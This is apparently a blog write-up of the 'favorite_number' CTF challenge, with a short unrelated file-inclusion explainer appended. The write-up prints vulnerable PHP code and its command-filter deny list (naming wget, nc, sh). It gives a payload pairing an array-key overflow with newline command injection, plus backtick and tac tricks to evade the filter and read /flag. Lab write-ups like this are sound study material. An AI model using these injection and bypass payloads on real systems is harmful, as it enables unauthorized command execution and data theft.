攻防世界----favorite_number

知识点1 php5.5.9版本数字溢出漏洞

知识点2 代码执行的绕过技巧

<?php
//php5.5.9
$stuff = $_POST["stuff"];
$array = ['admin', 'user'];
if($stuff === $array && $stuff[0] != 'admin') {、
//在这里就用到了数字溢出漏洞,
    $num= $_POST["num"];
    if (preg_match("/^\d+$/im",$num)){
        if (!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)){
//这里用到绕过的知识点
            echo "my favorite num is:";
            system("echo ".$num);
        }else{
            echo 'Bonjour!';
        }
    }
} else {
    highlight_file(__FILE__);
}

1.数字溢出漏洞

漏洞原理

即,当数组为九位16机制数时,会溢出,等同于重新排序,16的8次方即4294967296在逻辑上等同于下标0;

16的八次方 = 4294967296;

解题:

步骤1

$stuff === $array && $stuff[0] != 'admin'

跟据这行代码我们构造参数为

stuff[4294967296]=admin&stuff[1]=user

步骤2

system("echo ".$num);

看到system函数,猜测为命令执行漏洞,利用截断符(%0a,即换行)来进行命令执行

构造参数

num=1%0als

payload为

stuff[4294967296]=admin&stuff[1]=user&num=1%0als

将参数放在hackbar执行(因为参数是post请求的)并且通过bp拦截post请求包

注意到 %0D%0A,这个是windows系统的截断符,将其换成 %0a后即可进行命令执行 

(这里的a不区分大小写)

 成功找到漏洞点

步骤2 

接下来就是绕过了

!preg_match("/sh|wget|nc|python|php|perl|\?|flag|}|cat|echo|\*|\^|\]|\\\\|'|\"|\|/i",$num)
//这些字符都被过滤了
sh,wget,nc,python,php,perl,?,flag,},cat,echo,*,^,],\,',",|

常用的,如ls并没有被过滤

那个+号是因为这个字符被url编码了,因此空格得用+号来替代

解决cat被禁

因为cat被ban了,因此我们用tac,tac命令就是反着的cat命令。

cat命令是第一行到最后一行输出,tac是最后一行到第一行输出

 解决flag被禁

尝试fla*,发现*也被禁了

问题在于怎么给tac传递 /flag参数

方式1,官方题解

通过给一个文件写入 /flag路径,再通过这个文件拿到/flag

先后向zer0b文件写入 /fla,g 组成/flag,再通过 tac 命令获取zer0b的内容,即可获取/flag

 `,这个符号(在键盘的tab键上方)在linux中相当于优先执行的权限

tac `tac /tmp/zer0b` 这条命令执行过程

首先执行 ``里的内容即 tac /tmp/zer0b 执行结果为 /flag

其次执行整个语句即 tac /flag
成功获取flag

在网络安全领域,文件包含漏洞(File Inclusion Vulnerability)是一种常见且危险的安全漏洞。文件包含漏洞通常出现在Web应用程序中,允许攻击者通过特定的参数或输入来包含并执行任意文件,从而可能导致服务器被完全控制或敏感信息泄露。 文件包含漏洞主要分为两种类型: 1. **本地文件包含(Local File Inclusion, LFI)**: - 攻击者可以包含服务器上的本地文件。 - 例如,攻击者可以通过修改URL参数来包含服务器的敏感配置文件或密码文件。 2. **远程文件包含(Remote File Inclusion, RFI)**: - 攻击者可以包含远程服务器上的文件。 - 例如,攻击者可以通过修改URL参数来包含远程服务器上的恶意脚本,从而执行任意代码。 ### 示例 假设有一个简单的PHP脚本用于包含文件: ```php <?php $file = $_GET[&#39;file&#39;]; include($file); ?> ``` 在这个例子中,攻击者可以通过修改`file`参数来包含任意文件。例如,访问以下URL: ``` http://example.com/page.php?file=/etc/passwd ``` 攻击者可以获取服务器的`/etc/passwd`文件内容。 ### 防御措施 1. **输入验证**:确保用户输入的文件名符合预期,例如只允许包含特定目录下的文件。 2. **使用白名单**:定义一个允许包含的文件列表,拒绝所有不在白名单中的文件。 3. **禁用远程文件包含**:在PHP配置文件中设置`allow_url_include`为`Off`,防止远程文件包含。 4. **最小权限原则**:确保Web服务器进程只具有必要的文件访问权限。 ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

jjj34

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值